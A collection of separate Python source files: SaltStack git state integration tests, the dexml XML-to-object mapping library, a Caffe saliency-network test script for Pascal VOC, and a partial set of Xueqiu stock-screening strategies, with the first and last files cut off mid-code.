self.skipTest(msg.format(self.__domain))
def test_latest(self):
'''
git.latest
'''
name = os.path.join(integration.TMP, 'salt_repo')
try:
ret = self.run_state(
'git.latest',
name='https://{0}/saltstack/salt-test-repo.git'.format(self.__domain),
target=name
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(name, '.git')))
finally:
shutil.rmtree(name, ignore_errors=True)
def test_latest_with_rev_and_submodules(self):
'''
git.latest
'''
name = os.path.join(integration.TMP, 'salt_repo')
try:
ret = self.run_state(
'git.latest',
name='https://{0}/saltstack/salt-test-repo.git'.format(self.__domain),
rev='develop',
target=name,
submodules=True
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(name, '.git')))
finally:
shutil.rmtree(name, ignore_errors=True)
def test_latest_failure(self):
'''
git.latest
'''
name = os.path.join(integration.TMP, 'salt_repo')
try:
ret = self.run_state(
'git.latest',
name='https://youSpelledGitHubWrong.com/saltstack/salt-test-repo.git',
rev='develop',
target=name,
submodules=True
)
self.assertSaltFalseReturn(ret)
self.assertFalse(os.path.isdir(os.path.join(name, '.git')))
finally:
shutil.rmtree(name, ignore_errors=True)
def test_latest_empty_dir(self):
'''
git.latest
'''
name = os.path.join(integration.TMP, 'salt_repo')
if not os.path.isdir(name):
os.mkdir(name)
try:
ret = self.run_state(
'git.latest',
name='https://{0}/saltstack/salt-test-repo.git'.format(self.__domain),
rev='develop',
target=name,
submodules=True
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(name, '.git')))
finally:
shutil.rmtree(name, ignore_errors=True)
def test_latest_unless_no_cwd_issue_6800(self):
'''
cwd=target was being passed to _run_check which blew up if
target dir did not already exist.
'''
name = os.path.join(integration.TMP, 'salt_repo')
if os.path.isdir(name):
shutil.rmtree(name)
try:
ret = self.run_state(
'git.latest',
name='https://{0}/saltstack/salt-test-repo.git'.format(self.__domain),
rev='develop',
target=name,
unless='test -e {0}'.format(name),
submodules=True
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(name, '.git')))
finally:
shutil.rmtree(name, ignore_errors=True)
def test_numeric_rev(self):
'''
git.latest with numeric revision
'''
name = os.path.join(integration.TMP, 'salt_repo')
try:
ret = self.run_state(
'git.latest',
name='https://{0}/saltstack/salt-test-repo.git'.format(self.__domain),
rev=0.11,
target=name,
submodules=True,
timeout=120
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(name, '.git')))
finally:
shutil.rmtree(name, ignore_errors=True)
def test_latest_with_local_changes(self):
'''
Ensure that we fail the state when there are local changes and succeed
when force_reset is True.
'''
name = os.path.join(integration.TMP, 'salt_repo')
try:
# Clone repo
ret = self.run_state(
'git.latest',
name='https://{0}/saltstack/salt-test-repo.git'.format(self.__domain),
target=name
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isdir(os.path.join(name, '.git')))
# Make change to LICENSE file.
with salt.utils.fopen(os.path.join(name, 'LICENSE'), 'a') as fp_:
fp_.write('Lorem ipsum dolor blah blah blah....\n')
# Make sure that we now have uncommitted changes
self.assertTrue(self.run_function('git.diff', [name, 'HEAD']))
# Re-run state with force_reset=False, this should fail
ret = self.run_state(
'git.latest',
name='https://{0}/saltstack/salt-test-repo.git'.format(self.__domain),
target=name,
force_reset=False
)
self.assertSaltFalseReturn(ret)
# Now run the state with force_reset=True, this should succeed
ret = self.run_state(
'git.latest',
name='https://{0}/saltstack/salt-test-repo.git'.format(self.__domain),
target=name,
force_reset=True
)
self.assertSaltTrueReturn(ret)
# Make sure that we no longer have uncommitted changes
self.assertFalse(self.run_function('git.diff', [name, 'HEAD']))
finally:
shutil.rmtree(name, ignore_errors=True)
def test_present(self):
'''
git.present
'''
name = os.path.join(integration.TMP, 'salt_repo')
try:
ret = self.run_state(
'git.present',
name=name,
bare=True
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(os.path.join(name, 'HEAD')))
finally:
shutil.rmtree(name, ignore_errors=True)
def test_present_failure(self):
'''
git.present
'''
name = os.path.join(integration.TMP, 'salt_repo')
if not os.path.isdir(name):
os.mkdir(name)
try:
fname = os.path.join(name, 'stoptheprocess')
with salt.utils.fopen(fname, 'a') as fh_:
fh_.write('')
ret = self.run_state(
'git.present',
name=name,
bare=True
)
self.assertSaltFalseReturn(ret)
self.assertFalse(os.path.isfile(os.path.join(name, 'HEAD')))
finally:
shutil.rmtree(name, ignore_errors=True)
def test_present_empty_dir(self):
'''
git.present
'''
name = os.path.join(integration.TMP, 'salt_repo')
if not os.path.isdir(name):
os.mkdir(name)
try:
ret = self.run_state(
'git.present',
name=name,
bare=True
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(os.path.join(name, 'HEAD')))
finally:
shutil.rmtree(name, ignore_errors=True)
@skip_if_binaries_missing('git')
def test_config_set_value_with_space_character(self):
'''
git.config
'''
name = tempfile.mkdtemp(dir=integration.TMP)
self.addCleanup(shutil.rmtree, name, ignore_errors=True)
subprocess.check_call(['git', 'init', '--quiet', name])
ret = self.run_state(
'git.config_set',
name='user.name',
value='foo bar',
repo=name,
**{'global': False})
self.assertSaltTrueReturn(ret)
if __name__ == '__main__':
from integration import run_tests
run_tests(GitTest)
|
|
"""
dexml: a dead-simple Object-XML mapper for Python
==================================================
Let's face it: xml is a fact of modern life. I'd even go so far as to say
that it's *good* at what is does. But that doesn't mean it's easy to work
with and it doesn't mean that we have to like it. Most of the time, XML
just needs to get out of the way and let you do some actual work instead
of writing code to traverse and manipulate yet another DOM.
The dexml module takes the obvious mapping between XML tags and Python objects
and lets you capture that as cleanly as possible. Loosely inspired by Django's
ORM, you write simple class definitions to define the expected structure of
your XML document. Like so::
>>> import dexml
>>> from dexml import fields
>>> class Person(dexml.Model):
... name = fields.String()
... age = fields.Integer(tagname='age')
Then you can parse an XML document into an object like this::
>>> p = Person.parse("<Person name='Foo McBar'><age>42</age></Person>")
>>> p.name
u'Foo McBar'
>>> p.age
42
And you can render an object into an XML document like this::
>>> p = Person(name="Handsome B. Wonderful",age=36)
>>> p.render()
'<?xml version="1.0" ?><Person name="Handsome B. Wonderful"><age>36</age></Person>'
Malformed documents will raise a ParseError::
>>> p = Person.parse("<Person><age>92</age></Person>")
Traceback (most recent call last):
...
ParseError: required field not found: 'name'
Of course, it gets more interesting when you nest Model definitions, like this::
>>> class Group(dexml.Model):
... name = fields.String(attrname="name")
... members = fields.List(Person)
...
>>> g = Group(name="Monty Python")
>>> g.members.append(Person(name="John Cleese",age=69))
>>> g.members.append(Person(name="Terry Jones",age=67))
>>> g.render(fragment=True)
'<Group name="Monty Python"><Person name="John Cleese"><age>69</age></Person><Person name="Terry Jones"><age>67</age></Person></Group>'
There's support for XML namespaces, default field values, case-insensitive
parsing, and more fun stuff. Check out the documentation on the following
classes for more details:
:Model: the base class for objects that map into XML
:Field: the base class for individual model fields
:Meta: meta-information about how to parse/render a model
"""
__ver_major__ = 0
__ver_minor__ = 5
__ver_patch__ = 1
__ver_sub__ = ""
__version__ = "%d.%d.%d%s" % (__ver_major__,__ver_minor__,__ver_patch__,__ver_sub__)
import sys
import re
import copy
from xml.dom import minidom
from dexml import fields
if sys.version_info >= (3,):
str = str #pragma: no cover
unicode = str #pragma: no cover
bytes = bytes #pragma: no cover
basestring = (str,bytes) #pragma: no cover
else:
str = str #pragma: no cover
unicode = unicode #pragma: no cover
bytes = str #pragma: no cover
basestring = basestring #pragma: no cover
class Error(Exception):
"""Base exception class for the dexml module."""
pass
class ParseError(Error):
"""Exception raised when XML could not be parsed into objects."""
pass
class RenderError(Error):
"""Exception raised when object could not be rendered into XML."""
pass
class XmlError(Error):
"""Exception raised to encapsulate errors from underlying XML parser."""
pass
class PARSE_DONE:
"""Constant returned by a Field when it has finished parsing."""
pass
class PARSE_MORE:
"""Constant returned by a Field when it wants additional nodes to parse."""
pass
class PARSE_SKIP:
"""Constant returned by a Field when it cannot parse the given node."""
pass
class PARSE_CHILDREN:
"""Constant returned by a Field to parse children from its container tag."""
pass
class Meta:
"""Class holding meta-information about a dexml.Model subclass.
Each dexml.Model subclass has an attribute 'meta' which is an instance
of this class. That instance holds information about how the model
corresponds to XML, such as its tagname, namespace, and error handling
semantics. You would not ordinarily create an instance of this class;
instead let the ModelMetaclass create one automatically.
These attributes control how the model corresponds to the XML:
* tagname: the name of the tag representing this model
* namespace: the XML namespace in which this model lives
These attributes control parsing/rendering behaviour:
* namespace_prefix: the prefix to use for rendering namespaced tags
* ignore_unknown_elements: ignore unknown elements when parsing
* case_sensitive: match tag/attr names case-sensitively
* order_sensitive: match child tags in order of field definition
"""
_defaults = {"tagname":None,
"namespace":None,
"namespace_prefix":None,
"ignore_unknown_elements":True,
"case_sensitive":True,
"order_sensitive":True}
def __init__(self,name,meta_attrs):
for (attr,default) in self._defaults.items():
setattr(self,attr,meta_attrs.get(attr,default))
if self.tagname is None:
self.tagname = name
def _meta_attributes(meta):
"""Extract attributes from a "meta" object."""
meta_attrs = {}
if meta:
for attr in dir(meta):
if not attr.startswith("_"):
meta_attrs[attr] = getattr(meta,attr)
return meta_attrs
class ModelMetaclass(type):
"""Metaclass for dexml.Model and subclasses.
This metaclass is responsible for introspecting Model class definitions
and setting up appropriate default behaviours. For example, this metaclass
sets a Model's default tagname to be equal to the declared class name.
"""
instances_by_tagname = {}
instances_by_classname = {}
def __new__(mcls,name,bases,attrs):
cls = super(ModelMetaclass,mcls).__new__(mcls,name,bases,attrs)
# Don't do anything if it's not a subclass of Model
parents = [b for b in bases if isinstance(b, ModelMetaclass)]
if not parents:
return cls
# Set up the cls.meta object, inheriting from base classes
meta_attrs = {}
for base in reversed(bases):
if isinstance(base,ModelMetaclass) and hasattr(base,"meta"):
meta_attrs.update(_meta_attributes(base.meta))
meta_attrs.pop("tagname",None)
meta_attrs.update(_meta_attributes(attrs.get("meta",None)))
cls.meta = Meta(name,meta_attrs)
# Create ordered list of field objects, telling each about their
# name and containing class. Inherit fields from base classes
# only if not overridden on the class itself.
base_fields = {}
for base in bases:
if not isinstance(base,ModelMetaclass):
continue
for field in base._fields:
if field.field_name not in base_fields:
field = copy.copy(field)
field.model_class = cls
base_fields[field.field_name] = field
cls_fields = []
for (name,value) in attrs.iteritems():
if isinstance(value,fields.Field):
base_fields.pop(name,None)
value.field_name = name
value.model_class = cls
cls_fields.append(value)
cls._fields = base_fields.values() + cls_fields
cls._fields.sort(key=lambda f: f._order_counter)
# Register the new class so we can find it by name later on
tagname = (cls.meta.namespace,cls.meta.tagname)
mcls.instances_by_tagname[tagname] = cls
mcls.instances_by_classname[cls.__name__] = cls
return cls
@classmethod
def find_class(mcls,tagname,namespace=None):
"""Find dexml.Model subclass for the given tagname and namespace."""
try:
return mcls.instances_by_tagname[(namespace,tagname)]
except KeyError:
if namespace is None:
try:
return mcls.instances_by_classname[tagname]
except KeyError:
pass
return None
# You can use this re to extract the encoding declaration from the XML
# document string. Hopefully you won't have to, but you might need to...
_XML_ENCODING_RE = re.compile("<\\?xml [^>]*encoding=[\"']([a-zA-Z0-9\\.\\-\\_]+)[\"'][^>]*?>")
class Model(object):
"""Base class for dexml Model objects.
Subclasses of Model represent a concrete type of object that can parsed
from or rendered to an XML document. The mapping to/from XML is controlled
by two things:
* attributes declared on an inner class named 'meta'
* fields declared using instances of fields.Field
Here's a quick example:
class Person(dexml.Model):
# This overrides the default tagname of 'Person'
class meta
tagname = "person"
# This maps to a 'name' attributr on the <person> tag
name = fields.String()
# This maps to an <age> tag within the <person> tag
age = fields.Integer(tagname='age')
See the 'Meta' class in this module for available meta options, and the
'fields' submodule for available field types.
"""
__metaclass__ = ModelMetaclass
_fields = []
def __init__(self,**kwds):
"""Default Model constructor.
Keyword arguments that correspond to declared fields are processed
and assigned to that field.
"""
for f in self._fields:
try:
setattr(self,f.field_name,kwds[f.field_name])
except KeyError:
pass
@classmethod
def parse(cls,xml):
"""Produce an instance of this model from some xml.
The given xml can be a string, a readable file-like object, or
a DOM node; we might add support for more types in the future.
"""
self = cls()
node = self._make_xml_node(xml)
self.validate_xml_node(node)
# Keep track of fields that have successfully parsed something
fields_found = []
# Try to consume all the node's attributes
attrs = node.attributes.values()
for field in self._fields:
unused_attrs = field.parse_attributes(self,attrs)
if len(unused_attrs) < len(attrs):
fields_found.append(field)
attrs = unused_attrs
for attr in attrs:
self._handle_unparsed_node(attr)
# Try to consume all child nodes
if self.meta.order_sensitive:
self._parse_children_ordered(node,self._fields,fields_found)
else:
self._parse_children_unordered(node,self._fields,fields_found)
# Check that all required fields have been found
for field in self._fields:
if field.required and field not in fields_found:
err = "required field not found: '%s'" % (field.field_name,)
raise ParseError(err)
field.parse_done(self)
# All done, return the instance so created
return self
def _parse_children_ordered(self,node,fields,fields_found):
"""Parse the children of the given node using strict field ordering."""
cur_field_idx = 0
for child in node.childNodes:
idx = cur_field_idx
# If we successfully break out of this loop, one of our
# fields has consumed the node.
while idx < len(fields):
field = fields[idx]
res = field.parse_child_node(self,child)
if res is PARSE_DONE:
if field not in fields_found:
fields_found.append(field)
cur_field_idx = idx + 1
break
if res is PARSE_MORE:
if field not in fields_found:
fields_found.append(field)
cur_field_idx = idx
break
if res is PARSE_CHILDREN:
if field not in fields_found:
fields_found.append(field)
self._parse_children_ordered(child,[field],fields_found)
cur_field_idx = idx
break
idx += 1
else:
self._handle_unparsed_node(child)
def _parse_children_unordered(self,node,fields,fields_found):
"""Parse the children of the given node using loose field ordering."""
done_fields = {}
for child in node.childNodes:
idx = 0
# If we successfully break out of this loop, one of our
# fields has consumed the node.
while idx < len(fields):
if idx in done_fields:
idx += 1
continue
field = fields[idx]
res = field.parse_child_node(self,child)
if res is PARSE_DONE:
done_fields[idx] = True
if field not in fields_found:
fields_found.append(field)
break
if res is PARSE_MORE:
if field not in fields_found:
fields_found.append(field)
break
if res is PARSE_CHILDREN:
if field not in fields_found:
fields_found.append(field)
self._parse_children_unordered(child,[field],fields_found)
break
idx += 1
else:
self._handle_unparsed_node(child)
def _handle_unparsed_node(self,node):
if not self.meta.ignore_unknown_elements:
if node.nodeType == node.ELEMENT_NODE:
err = "unknown element: %s" % (node.nodeName,)
raise ParseError(err)
elif node.nodeType in (node.TEXT_NODE,node.CDATA_SECTION_NODE):
if node.nodeValue.strip():
err = "unparsed text node: %s" % (node.nodeValue,)
raise ParseError(err)
elif node.nodeType == node.ATTRIBUTE_NODE:
if not node.nodeName.startswith("xml"):
err = "unknown attribute: %s" % (node.name,)
raise ParseError(err)
def render(self,encoding=None,fragment=False,pretty=False,nsmap=None):
"""Produce XML from this model's instance data.
A unicode string will be returned if any of the objects contain
unicode values; specifying the 'encoding' argument forces generation
of a bytestring.
By default a complete XML document is produced, including the
leading "<?xml>" declaration. To generate an XML fragment set
the 'fragment' argument to True.
"""
if nsmap is None:
nsmap = {}
data = []
header = '<?xml version="1.0" ?>'
if encoding:
header = '<?xml version="1.0" encoding="%s" ?>' % (encoding,)
if not fragment:
data.append(header)
data.extend(self._render(nsmap))
xml = "".join(data)
if pretty:
xml = minidom.parseString(xml).toprettyxml()
# Hack for removing the `<?xml version="1.0"?>` header that
# minidom adds when pretty printing.
line_break_position = xml.find('\n') + 1
headless_xml = xml[line_break_position:]
if fragment:
xml = headless_xml
elif encoding:
# Minidom also removes the header (or just the `encoding` key)
# if it is present
xml = header + '\n' + headless_xml
if encoding:
xml = xml.encode(encoding)
return xml
def irender(self,encoding=None,fragment=False,nsmap=None):
"""Generator producing XML from this model's instance data.
If any of the objects contain unicode values, the resulting output
stream will be a mix of bytestrings and unicode; specify the 'encoding'
arugment to force generation of bytestrings.
By default a complete XML document is produced, including the
leading "<?xml>" declaration. To generate an XML fragment set
the 'fragment' argument to True.
"""
if nsmap is None:
nsmap = {}
if not fragment:
if encoding:
decl = '<?xml version="1.0" encoding="%s" ?>' % (encoding,)
yield decl.encode(encoding)
else:
yield '<?xml version="1.0" ?>'
if encoding:
for data in self._render(nsmap):
if isinstance(data,unicode):
data = data.encode(encoding)
yield data
else:
for data in self._render(nsmap):
yield data
def _render(self,nsmap):
"""Generator rendering this model as an XML fragment."""
# Determine opening and closing tags
pushed_ns = False
if self.meta.namespace:
namespace = self.meta.namespace
prefix = self.meta.namespace_prefix
try:
cur_ns = nsmap[prefix]
except KeyError:
cur_ns = []
nsmap[prefix] = cur_ns
if prefix:
tagname = "%s:%s" % (prefix,self.meta.tagname)
open_tag_contents = [tagname]
if not cur_ns or cur_ns[0] != namespace:
cur_ns.insert(0,namespace)
pushed_ns = True
open_tag_contents.append('xmlns:%s="%s"'%(prefix,namespace))
close_tag_contents = tagname
else:
open_tag_contents = [self.meta.tagname]
if not cur_ns or cur_ns[0] != namespace:
cur_ns.insert(0,namespace)
pushed_ns = True
open_tag_contents.append('xmlns="%s"'%(namespace,))
close_tag_contents = self.meta.tagname
else:
open_tag_contents = [self.meta.tagname]
close_tag_contents = self.meta.tagname
used_fields = set()
open_tag_contents.extend(self._render_attributes(used_fields,nsmap))
# Render each child node
children = self._render_children(used_fields,nsmap)
try:
first_child = children.next()
except StopIteration:
yield "<%s />" % (" ".join(open_tag_contents),)
else:
yield "<%s>" % (" ".join(open_tag_contents),)
yield first_child
for child in children:
yield child
yield "</%s>" % (close_tag_contents,)
# Check that all required fields actually rendered something
for f in self._fields:
if f.required and f not in used_fields:
raise RenderError("Field '%s' is missing" % (f.field_name,))
# Clean up
if pushed_ns:
nsmap[prefix].pop(0)
def _render_attributes(self,used_fields,nsmap):
for f in self._fields:
val = getattr(self,f.field_name)
datas = iter(f.render_attributes(self,val,nsmap))
try:
data = datas.next()
except StopIteration:
pass
else:
used_fields.add(f)
yield data
for data in datas:
yield data
def _render_children(self,used_fields,nsmap):
for f in self._fields:
val = getattr(self,f.field_name)
datas = iter(f.render_children(self,val,nsmap))
try:
data = datas.next()
except StopIteration:
pass
else:
used_fields.add(f)
yield data
for data in datas:
yield data
@staticmethod
def _make_xml_node(xml):
"""Transform a variety of input formats to an XML DOM node."""
try:
ntype = xml.nodeType
except AttributeError:
if isinstance(xml,bytes):
try:
xml = minidom.parseString(xml)
except Exception, e:
raise XmlError(e)
elif isinstance(xml,unicode):
try:
# Try to grab the "encoding" attribute from the XML.
# It probably won't exist, so default to utf8.
encoding = _XML_ENCODING_RE.match(xml)
if encoding is None:
encoding = "utf8"
else:
encoding = encoding.group(1)
xml = minidom.parseString(xml.encode(encoding))
except Exception, e:
raise XmlError(e)
elif hasattr(xml,"read"):
try:
xml = minidom.parse(xml)
except Exception, e:
raise XmlError(e)
else:
raise ValueError("Can't convert that to an XML DOM node")
node = xml.documentElement
else:
if ntype == xml.DOCUMENT_NODE:
node = xml.documentElement
else:
node = xml
return node
@classmethod
def validate_xml_node(cls,node):
"""Check that the given xml node is valid for this object.
Here 'valid' means that it is the right tag, in the right
namespace. We might add more eventually...
"""
if node.nodeType != node.ELEMENT_NODE:
err = "Class '%s' got a non-element node"
err = err % (cls.__name__,)
raise ParseError(err)
if cls.meta.case_sensitive:
if node.localName != cls.meta.tagname:
err = "Class '%s' got tag '%s' (expected '%s')"
err = err % (cls.__name__,node.localName,
cls.meta.tagname)
raise ParseError(err)
else:
if node.localName.lower() != cls.meta.tagname.lower():
err = "Class '%s' got tag '%s' (expected '%s')"
err = err % (cls.__name__,node.localName,
cls.meta.tagname)
raise ParseError(err)
if cls.meta.namespace:
if node.namespaceURI != cls.meta.namespace:
err = "Class '%s' got namespace '%s' (expected '%s')"
err = err % (cls.__name__,node.namespaceURI,
cls.meta.namespace)
raise ParseError(err)
else:
if node.namespaceURI:
err = "Class '%s' got namespace '%s' (expected no namespace)"
err = err % (cls.__name__,node.namespaceURI,)
raise ParseError(err)
|
|
#!/usr/bin/env python
__author__ = 'joon'
import sys
sys.path.insert(0, 'src')
sys.path.insert(0, 'lib')
sys.path.insert(0, 'ResearchTools')
from imports.basic_modules import *
from imports.import_caffe import *
from imports.ResearchTools import *
from imports.libmodules import *
from config import config_test
####
EXP_PHASE = 'saliency-test'
conf = dict(
vis=True,
save_heat=True,
overridecache=True,
shuffle=False,
pascalroot="/BS/joon_projects/work",
gpu=1,
n=0,
N=1,
)
control = dict(
net='DeepLabv2_ResNet',
dataset='MSRA',
datatype='NP',
test_dataset='voc12val',
test_datatype='Segmentation',
)
####
def parse_input(argv=sys.argv):
parser = argparse.ArgumentParser(description="Tests saliency network")
parser.add_argument('--net', default='DeepLabv2_ResNet', type=str,
help='Network')
parser.add_argument('--dataset', default='MSRA', type=str,
help='Training set')
parser.add_argument('--datatype', default='NP', type=str,
help='Type of training set')
parser.add_argument('--test_dataset', default='voc12val', type=str,
help='Test dataset')
parser.add_argument('--test_datatype', default='Segmentation', type=str,
help='Type of test data')
control = vars(parser.parse_known_args(argv)[0])
parser_conf = argparse.ArgumentParser()
parser_conf.add_argument('--pascalroot', default='/home', type=str,
help='Pascal VOC root folder')
parser_conf.add_argument('--gpu', default=1, type=int,
help='GPU ID')
parser_conf.add_argument('--vis', default=False, type=bool,
help='Visualisation')
parser_conf.add_argument('--save_heat', default=True, type=bool,
help='Save raw heatmap output')
parser_conf.add_argument('--overridecache', default=True, type=bool,
help='Override cache')
parser_conf.add_argument('--shuffle', default=True, type=bool,
help='Shuffle test input order')
parser_conf.add_argument('--N', default=1, type=int,
help='Fragment test set into N fragments')
parser_conf.add_argument('--n', default=0, type=int,
help='test n th fragment')
conf = vars(parser_conf.parse_known_args(argv)[0])
return control, conf
def process_test_input(im, transformer, input_padded_size):
H, W = im.shape[:2]
if (H <= input_padded_size and W <= input_padded_size):
factor = 1
pass
else:
factor = min(float(input_padded_size) / H, float(input_padded_size) / W)
im = scipy.misc.imresize(im, factor, interp="bilinear")
H, W = im.shape[:2]
margin = [input_padded_size - H, input_padded_size - W]
margins = [
margin[0] // 2,
margin[0] - margin[0] // 2,
margin[1] // 2,
margin[1] - margin[1] // 2,
]
input_image = cv2.copyMakeBorder(im, margins[0], margins[1], margins[2], margins[3], cv2.BORDER_REFLECT_101)
input_image = transformer.preprocess('data', input_image)
return input_image, margins, factor, H, W
def net_forward(net, input_image):
net.blobs['data'].data[:] = input_image.astype(np.float32)
output = net.forward()
prob = output['fc1_prob'][0]
return prob
def process_test_output_prob(prob, margins, H_original, W_original, H, W, input_padded_size, factor):
prob_trimmed = np.zeros([2, H_original, W_original], dtype=np.float32)
for ch in range(prob_trimmed.shape[0]):
prob_tmp = scipy.misc.imresize(prob[ch], [input_padded_size, input_padded_size], mode='F')
prob_tmp = prob_tmp[margins[0]:margins[0] + H, margins[2]:margins[2] + W]
prob_trimmed[ch] = scipy.misc.imresize(prob_tmp, [H_original, W_original], mode='F')
return prob_trimmed
def run_test(net, out_dir, control, conf):
year = '20' + control['test_dataset'][3:5]
pascal_list = get_pascal_indexlist(conf['pascalroot'], year, control['test_datatype'], control['test_dataset'][5:],
shuffle=conf['shuffle'], n=conf['n'], N=conf['N'])
num_test = len(pascal_list)
print('%d images for testing' % num_test)
transformer = set_preprocessor_without_net(
[1, 3, conf['input_padded_size'], conf['input_padded_size']],
mean_image=np.array([104.008, 116.669, 122.675],
dtype=np.float))
pred_list = []
id_list = []
start_time = time.time()
for idx in range(num_test):
end_time = time.time()
print (' Iter %d took %2.1f seconds' % (idx, end_time - start_time))
start_time = time.time()
print (' Running %d out of %d images' % (idx + 1, num_test))
inst = idx
im_id = pascal_list[inst]
outfile = osp.join(out_dir, im_id + '.mat')
if conf['save_heat']:
if not conf['overridecache']:
if osp.isfile(outfile):
print('skipping')
continue
imloc = os.path.join(conf['pascalroot'], 'VOC' + year, 'JPEGImages', im_id + '.jpg')
image = load_image_PIL(imloc)
imshape_original = image.shape[:2]
input_image, margins, factor, H, W = process_test_input(image, transformer, conf['input_padded_size'])
prob = net_forward(net, input_image)
prob = process_test_output_prob(prob, margins, imshape_original[0], imshape_original[1], H, W,
conf['input_padded_size'], factor)
sal = 255 * prob[1] / prob[1].max()
if conf['vis']:
def visualise_data():
fig = plt.figure(0, figsize=(15, 10))
fig.suptitle('ID:{}'.format(im_id))
ax = fig.add_subplot(1, 2, 1)
ax.set_title('Original image')
pim(image)
ax = fig.add_subplot(2, 2, 2)
ax.set_title('Saliency prediction')
ax.imshow(sal, cmap="hot", clim=(0, 255))
ax = fig.add_subplot(2, 2, 4)
ax.imshow(image)
ax.imshow(sal, alpha=.5, cmap="hot", clim=(0, 255))
for iii in range(3):
fig.axes[iii].get_xaxis().set_visible(False)
fig.axes[iii].get_yaxis().set_visible(False)
plt.pause(1)
return
visualise_data()
if conf['save_heat']:
if not conf['overridecache']:
assert (not os.path.isfile(outfile))
else:
if os.path.isfile(outfile):
print('WARNING: OVERRIDING EXISTING RESULT FILE')
sio.savemat(outfile, dict(heatmap=sal, imshape_original=imshape_original))
print('results saved to %s' % outfile)
return
def crawl_net(conf):
testproto = osp.join('data', EXP_PHASE, 'deploy.prototxt')
learnedmodel = osp.join('data', EXP_PHASE, 'weights.caffemodel')
caffe.set_mode_gpu()
caffe.set_device(conf['gpu'])
net = caffe.Net(testproto, learnedmodel, caffe.TEST)
return net
def main(control, conf):
control, control_token, conf = config_test(control, conf, EXP_PHASE)
out_dir = osp.join('cache', EXP_PHASE, create_token(control_token))
mkdir_if_missing(out_dir)
print('saving to: {}'.format(out_dir))
net = crawl_net(conf)
run_test(net, out_dir, control, conf)
if __name__ == '__main__':
if len(sys.argv) != 1:
control, conf = parse_input(sys.argv)
main(control, conf)
|
|
from xueqiu_api import XueqiuApi
class XueqiuStrategies(object):
@staticmethod
def stable_strict():
stable = XueqiuApi('stable_strict')
stable.append_pettm('0', '15')
stable.append_pb()
stable.append_dy()
stable.append_roediluted('20161231', '15', is_order_by_this=True)
stable.append_roediluted('20151231', '15')
stable.append_roediluted('20141231', '15')
stable.append_roediluted('20131231', '15')
stable.append_roediluted('20121231', '15')
stable.append_roediluted('20111231', '12')
stable.append_roediluted('20101231', '10')
stable.append_roediluted('20091231', '10')
stable.append_income_grow('20161231')
stable.append_income_grow('20151231')
stable.append_income_grow('20141231')
stable.append_income_grow('20131231')
stable.append_income_grow('20121231')
stable.append_income_grow('20111231')
stable.append_income_grow('20101231')
stable.append_income_grow('20091231')
stable.append_profie_grow('20161231')
stable.append_profie_grow('20151231')
stable.append_profie_grow('20141231')
stable.append_profie_grow('20131231')
stable.append_profie_grow('20121231')
stable.append_profie_grow('20111231')
stable.append_profie_grow('20101231')
stable.append_profie_grow('20091231')
stable.append_gross('20161231')
stable.append_gross('20151231')
stable.append_gross('20141231')
stable.append_gross('20131231')
stable.append_gross('20121231')
# stable.append_gross('20111231')
# stable.append_gross('20101231')
# stable.append_gross('20091231')
stable.append_interest('20161231')
stable.append_interest('20151231')
stable.append_interest('20141231')
stable.append_interest('20131231')
stable.append_interest('20121231')
# stable.append_interest('20111231')
# stable.append_interest('20101231')
# stable.append_interest('20091231')
return stable
@staticmethod
def stable_short():
stable = XueqiuApi('stable_short')
stable.append_pettm('0', '30')
stable.append_pb()
stable.append_dy()
stable.append_pct_rate(start='-50', end='30')
stable.append_roediluted('20161231', '15', is_order_by_this=True)
stable.append_roediluted('20151231', '15')
stable.append_roediluted('20141231', '15')
stable.append_roediluted('20131231', '1')
stable.append_roediluted('20121231', '1')
stable.append_roediluted('20111231', '1')
stable.append_income_grow('20161231')
stable.append_income_grow('20151231')
stable.append_income_grow('20141231')
stable.append_income_grow('20131231')
stable.append_income_grow('20121231')
stable.append_income_grow('20111231')
stable.append_profie_grow('20161231')
stable.append_profie_grow('20151231')
stable.append_profie_grow('20141231')
stable.append_profie_grow('20131231')
stable.append_profie_grow('20121231')
stable.append_profie_grow('20111231')
stable.append_gross('20161231')
stable.append_gross('20151231')
stable.append_gross('20141231')
stable.append_gross('20131231')
stable.append_gross('20121231')
stable.append_gross('20111231')
stable.append_interest('20161231')
stable.append_interest('20151231')
stable.append_interest('20141231')
stable.append_interest('20131231')
stable.append_interest('20121231')
stable.append_interest('20111231')
return stable
@staticmethod
def stable():
stable = XueqiuApi('stable')
stable.append_pettm('0', '20')
stable.append_pb()
stable.append_dy()
stable.append_roediluted('20161231', '15', is_order_by_this=True)
stable.append_roediluted('20151231', '15')
stable.append_roediluted('20141231', '15')
stable.append_roediluted('20131231', '15')
stable.append_roediluted('20121231', '15')
stable.append_roediluted('20111231', '12')
stable.append_roediluted('20101231', '10')
stable.append_roediluted('20091231', '10')
stable.append_income_grow('20161231')
stable.append_income_grow('20151231')
stable.append_income_grow('20141231')
stable.append_income_grow('20131231')
stable.append_income_grow('20121231')
stable.append_income_grow('20111231')
stable.append_income_grow('20101231')
stable.append_income_grow('20091231')
stable.append_profie_grow('20161231')
stable.append_profie_grow('20151231')
stable.append_profie_grow('20141231')
stable.append_profie_grow('20131231')
stable.append_profie_grow('20121231')
stable.append_profie_grow('20111231')
stable.append_profie_grow('20101231')
stable.append_profie_grow('20091231')
stable.append_gross('20161231')
stable.append_gross('20151231')
stable.append_gross('20141231')
stable.append_gross('20131231')
stable.append_gross('20121231')
# stable.append_gross('20111231')
# stable.append_gross('20101231')
# stable.append_gross('20091231')
stable.append_interest('20160930')
stable.append_interest('20151231')
stable.append_interest('20141231')
stable.append_interest('20131231')
stable.append_interest('20121231')
# stable.append_interest('20111231')
# stable.append_interest('20101231')
# stable.append_interest('20091231')
return stable
@staticmethod
def stable_slow():
stable = XueqiuApi('stable_slow')
stable.append_pettm('0', '20')
stable.append_pb()
stable.append_dy()
stable.append_roediluted('20161231', '15', is_order_by_this=True)
stable.append_roediluted('20151231', '15')
stable.append_roediluted('20141231', '15')
stable.append_roediluted('20131231', '15')
stable.append_roediluted('20121231', '12')
stable.append_roediluted('20111231', '10')
